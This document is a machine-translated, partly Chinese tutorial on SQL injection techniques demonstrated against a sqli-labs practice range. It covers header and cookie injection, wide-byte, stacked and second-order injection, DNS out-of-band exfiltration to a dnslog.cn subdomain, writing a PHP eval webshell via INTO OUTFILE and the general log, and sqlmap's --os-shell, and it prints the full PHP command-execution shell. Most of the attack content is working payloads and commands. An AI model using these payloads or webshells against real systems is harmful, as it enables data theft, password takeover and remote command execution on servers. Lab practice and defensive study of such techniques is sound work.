Article directory
- 1. UA injection
- 2. Referer injection
- 3. DNSLOG takeaway
- 4. Cookie injection
- 5. Wide byte injection
- 6. Stack injection
- 7. Second injection
- 8. GETSHELL
- 9. Log GETSHELL
- 10. --os-shell (sqlmap)
1. UA injection
UA is 用户代理(User-Agent)the abbreviation of UA, which contains the operating system and version used by the customer, CPU type, browser and version, browser rendering engine, browser language, browser plug-in, etc.
1. Principle
Some websites often send different pages to different operating systems and different browsers by determining the UA, so some pages may not be displayed properly in a certain browser. At this time, there may be UA header injection. Generally, data will be inserted into a certain table, so it is ok 用报错注入.
2. Shooting range demonstration:
1) Once the page appears as follows, you can use UA injection
The browser version will be identified on the page.
2) BP packet capture
normal circumstances
Adding single quotes to UA will cause an error.
3) Modify User-Agent
Constructed POC, get the database name:
1' and updatexml(1,concat(0x7e,database()),1) and '
Since we don’t know how many parameters there are, the front single quotes are used to close the front ones, and the back single quotes are used to close the back ones. # cannot be used here to omit the back parameters. .
后续获取其他数据的方法和上一节的联合注入大同小异。
2. Referer injection
1. Principle
In the message, referer就是your browser needs to tell the server where you are accessing the server from (来源). Most websites or apps will write to the database to analyze where the traffic comes from and to calculate the cost of advertising investment. Generally, the data will be inserted into a certain database. So it's OK in the table 用报错注入.
2. Shooting range demonstration:
This range will log the source IP address
1) Use BP to capture packets
Correctly entered package
The error packet occurred
2) Modify Referer
Constructed POC, obtain database name:
' and updatexml(1,concat(0x7e,database()),1) and '
Since we don’t know how many parameters there are, the single quotes in the front are used to close the first ones, and the single quotes in the back are used to close the last ones. Here we omit the following 不能使用 # parameters.
后续获取其他数据的方法和上一节的联合注入大同小异。
3. DNSLOG takeaway
1. Usage scenarios
Usually when we face the situation that there is no echo during the SQL injection process, we can only judge whether there is SQL injection through blind injection. However, using blind injection and manual testing takes a lot of time. You may think of using sqlmap Run the data directly, but 实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉this will affect our test progress. Maybe you can also use a proxy pool.
After we enter the domain name, our local domain name server will query whether the IP address exists in its own server. If not, it will be sent to the root domain name server. If there is a corresponding record in the root domain name server, it will be returned. If not, it will tell the local domain name server to go to the top-level domain name server. Find.
2、DNS
DNS will leave records when parsing.
Simply put, when the dns server is our own, we can query some information by viewing the logs.
3. Inject the required conditions
-
1. DNS out-of-band query belongs to MySQL injection, and there is a system attribute in MySQL
secure_file_priv特性,该属性值必须为空(there is nothing after the equal sign). -
2. Use
LOAD_FILE()函数: LOAD_FILE() function to read a file and return its contents as a string.
The syntax is: load_file(file_name), where file_name is the full path of the file -
3. So it is needed
root权限and the server must beWindows操作系统.
4. How to use
Bring the unique field payload in the dnslog platform into the target to initiate a dns request. Through dns resolution, the key information after the request is combined into a new third-level domain name and brought out, which is displayed in the dns log of the ns server.
5. Shooting range demonstration:
1) Generate a DNS domain name
First, randomly generate a DNS domain name of the local IP on the DNSlog platform:
29lrdw.dnslog.cn
Ping the random subdomain name of the DNS domain name locally:
The asd I entered randomly here was successfully brought out.
2) Turn on the secure_file_priv attribute in MySQL
Then restart MySQL
3) Use BP to operate
Use injection statements to obtain the database name. POC used:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+database()),'.29lrdw.dnslog.cn/qwe')))--+
Return to the DNSLOG page to view
the database name.
Get the current username, using POC:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+ hex(user())),'.29lrdw.dnslog.cn/qwe')))--+
Return to the DNSLOG page to view
Decode using hex
In this way, the current user name is successfully obtained.
4) Why do you need to hex encode the query content?
If there are special characters in the username we want to query: such as !@#$%^&. Finally, when requesting the DNS server, it becomes: !@#$%^&*. 29lrdw.dnslog.cn. 存在特殊字符的域名无法解析. Therefore, the data we queried cannot be found in the DNS log. Therefore, you need to query after encoding. For example, the above user name is root@localhost, and there is a special character @. This cannot be parsed by the DNS server, so you can query the result and then decode it 需要hex编码.
When we query, when we are not sure whether there are special characters in the query results, it is best to hex encode them before bringing them into the query.
4. Cookie injection
1. Principle of injection
The parameters passed by get are filtered, but parameters can also be passed ignoring cookies.
The principle of cookie injection is the same as usual injection, except that we submit the submitted parameters in cookie mode, while for general injection we use get or post mode to submit.
(The get method is to add the statement that needs to be injected directly after the URL, and the post method is through the form method. The difference between get and post is that in one we can see the parameters we submitted through the IE address bar, and in the other But can’t.)
Cookie injection : Modify your own cookie. After obtaining the cookie in the background, it will be directly compared to the database. It may be injected during the comparison.
注意:该注入一般可以联合XSS攻击一起使用
2. Shooting range demonstration:
1) Cookie injection exists in the following situation through BP packet capture
2) Find the injection point and use single quotes to test
When the admin adds a single quote behind the cookie and an error occurs, then there is injection here.
3) Construct POC injection
Cookie: uname=admin ' and updatexml(1,concat(0x7e,database()),1) #
Note that the above POC is used #to ignore the following content, rather than using - -
5. Wide byte injection
1. Injection principle
When entering the database 使用GBK编码, the two characters will be merged into one Chinese character. Special value characters such as single quotes will be escaped. For example: ' -> \' (%27 -> %5c%27)
At this time, we can 单引号( ' )前面add a random GBK encoding, such as: %df. This encoding will eat the slash (\), thereby liberating the following single quote ('). At this time, %df%27在GBK编码中会变成%df%5c%27the %df%5c会合并成一个汉字remaining were %27( ' )liberated independently.
2. Shooting range demonstration:
1) In the following situation, wide byte injection exists
Adding one 'will automatically add \the escape method for filtering.
2) Construct POC injection
http:// 192.168.43.110:9006/Less-32/?id=In -1%df%27 union select 1,database(),user()--+
this way, the database name and user name are obtained.
注:It is assumed here that it is already known that the table has only three columns. The specific pre-process can be injected jointly in front of the parameters.
6. Stack injection
1. Injection principle
In SQL, the semicolon (;) is used to indicate the end of a SQL statement. Just imagine that we are; 结束一个sql语句后继续构造下一条语句,会不会一起执行?hence the idea of stack injection.
2. The difference between joint injection and stack injection
The difference is that the statement types executed by union or union all are limited 联合注入用来执行查询语句.堆叠注入可以执行的是任意的语句
3. Shooting range simulation:
Construct the POC as shown below:
http:// 192.168.43.110:9006/ /Less-38/?id=1'; insert into users(id,username,password)values(100,'kkkddd','kkkddd')--+
Then return to the shooting range to view the database.
In this way, the MySql command to create the user is successfully injected.
7. Second injection
1. Injection principle
The input content will be converted into a string and stored in the database, making it impossible to execute. Then we can 先把POC存储进数据库call out the POC stored in the data and execute it to achieve the injection effect.
Under normal circumstances, account names are not allowed to enter special symbols such as # @ \ ', but you can try it. If it works, you can try a secondary injection.
2. Usage scenarios
I know the existence of an account name and want to change the password corresponding to the account. For example, I know that there is an account called: admin, and then I create an account called: admin'#, and at the same time change the password of the admin'# account, thereby changing the password of admin.
3. Shooting range example:
1) There is a secondary injection in the following example
Use the admin account here
Log in normally, the length of the data packet I return is 265
No matter whether I add a single quote, two single quotes, or other characters after login_user above, an error will occur, which means that all the input content will be converted into string form for storage and query.
2) Create a new account
New account name: admin'#
New account password: 123456
Login successful.
3) Change the password of the new account
Account name: admin'#
New account password: 111111
4) Log out and log in again to view the results
I tried to log in to admin'#the account and found that the newly changed password: 111111 could not be logged in. I still had to use the old password 123456.
I tried to log in to adminthe account and found that the original password: admin could not be logged in. The password changed to: 111111.
5) Statement explanation:
The following SQL statement is used here:
UPDATE users SET PASSWORD='111111' where username='admin'#' and password='123456';
#It is not difficult to see here that all subsequent content is ignored when calling and becomes:
UPDATE users SET PASSWORD='111111' whereusername='admin'
Originally admin'#, modifying the account has become modifying adminthe account.
8. GETSHELL
1. Conditions for using SQL injection to obtain MYSQL database permissions
- 1) The highest authority of the root user
- 2) Know the absolute path of the website
- 3)
secure_file_priv= is empty or in the root directory of the website
2. Principle of file read and write injection
It uses the read and write permissions of the file for injection. It can write a one-sentence Trojan, and it can also read sensitive information of system files.
3. Conditions for file read and write injection
Higher versions of MYSQL have added a new feature secure_file_privthat limits the permissions of mysql export files.
4. secure_file_priv option
-
1) secure_file_priv=
means there are no restrictions on file reading and writing -
2) secure_file_priv=NULL
means that file reading and writing cannot be performed -
3) secure_file_priv=d:/phpstudy/mysql/data
means that files in this path can only be read and written.
Command:
show global variables like '%secure%'
#View the configuration of mysql global variables
5. Absolute paths of common websites
-
1) Common in Windows
-
2) Common in Linux
6. Common ways to obtain paths
Error display, legacy files, vulnerability error reports, platform configuration files, etc.
7. Read files
1) Functions used
load_file()Read file using
2) Notes on the path
Path cannot be used 反斜杠(\). Characters that can be converted using 斜杠(/), 双反斜杠(\\),0x,char
3) Generally use joint injection to use together
4) Shooting range demonstration
-
4.1. Create a file on the target machine.
Create a file named 1.txt in the C:\phpstudy_pro\WWW\sqli-labs-master directory. The content is: i am 1.txt
-
4.2. Construct POC to read the file
. Use SQL injection to read the file at the shooting range. The POC is:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,load_file('C:/phpstudy_pro/WWW/sqli-labs-master/1.txt'),3–+
In the same way, this method can read any file. In general practice, we can use this method to read the website's configuration files and log files.
注意:上面的路径不能使用反斜杠(\),只能使用斜杠(/)和双反斜杠(\\)。
8. Write files
1) Functions used
Use functions into outfile(can write multiple lines, output according to format) and into Dumpfile(can only write one line, and no dirty data)
2) Points to note about the outfile function
outfileThe path that starts with 0x or is converted to char can be followed later.只能是单引号路径
3) Shooting range demonstration:
3.1. Construct POC to write file
Now we need to create a file 3.txt in the C:\phpstudy_pro\WWW\sqli-labs-master directory and write the content. The POC is:
http://192.168.1.104:9006/Less-2/?id=- 1 union select 1,'helloword',3into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/3.txt'--+
Now go to the write directory
and view all the queried content.
注意:If the file name to be written already exists, the writing will fail.
3.2. Try to write to shell
Constructed POC:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1, '<?php%20@eval($_POST[\'x\']);?>',3into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/4.php'--+
Use shell tool to try to connect:
connection successful.
Return to view the written file:
3.3. The difference between into outfile and into Dumpfile
- into outfile No matter how you write, there will be dirty data such as spaces.
- into Dumpfile will automatically remove dirty data such as spaces
For example, in the above example, if you only want to leave pure PHP text and do not want other dirty text, you can use into Dumpfile and replace the characters 1, 3 and other characters with '' (two single quotation mark empty characters)
9. Log GETSHELL
1. Prerequisites:
- 1. Know the website
绝对路径 - 2. The website exists
堆叠注入. - 3. Possess
root权限
2. Specific steps:
- 1. Query the log path: show variables like '%general%';
- 2. Turn on the log: set global general_log = on; This is turned off by default;
- 3. Set the log path: set global general_log_file = 'D:\phpstudy_pro\WWW\shell.php';
- 4. Just write the shell command to the log, and then use the tool to connect to the shell.
3. Shooting range demonstration (stacked injection is known to exist):
1) First check whether the shooting range has enabled logs:
show variables like '%general%';
this is turned off by default.
2) Use stack injection to enable logs
set global general_log = on;
Return to the shooting range to see if it is turned on:
it shows that it is turned on.
3) Use stack injection to modify the path of the log
set global general_log_file = ‘D:\phpstudy_pro\WWW\shell.php’;
Return to the shooting range to check.
It is obvious that the log path has been changed.
4. Construct a shell in the URL and let it record into the log
Return to view the log.
In this way, the shell has successfully written to the log.
10. –os-shell (sqlmap)
1. Principle
–os-shell is to use udf to escalate privileges to obtain WebShell. Also write two files to the server through into oufile, one can 直接执行系统命令be进行上传文件
此为sqlmap的一个命令
2. Prerequisites for using the –os-shell command
- 1. It is required to be DBA, –is-dba (phpstudy usually builds DBA)
- 2. secure_file_priv has no specific value
- 3. Know the absolute path of the website
- 4. GPC is off, and PHP’s active escaping function is turned off.
3. Shooting range demonstration:
sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell
sqlmap generated two files in the specified directory (the file names are random and not fixed). The following two files are generated here:
tmpbeewq.php 用来执行系统命令tmpuqvgw.php 用来上传文件
3.1. Used to execute system command files
The file content of tmpbeewq.php is:
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){
$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{
$z=array();}$c=$c." 2>&1\n";function f($n){
global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){
ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){
$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){
$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){
$w=shell_exec($c);}elseif(f("passthru")){
ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){
$x=popen($c,r);$w=NULL;if(is_resource($x)){
while(!feof($x)){
$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){
$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{
$w=0;}echo"<pre>$w</pre>";?>
Try executing system command:
3.2. File upload file
Use tmpuqvgw.php to upload files
Let’s upload a php one-sentence backdoor
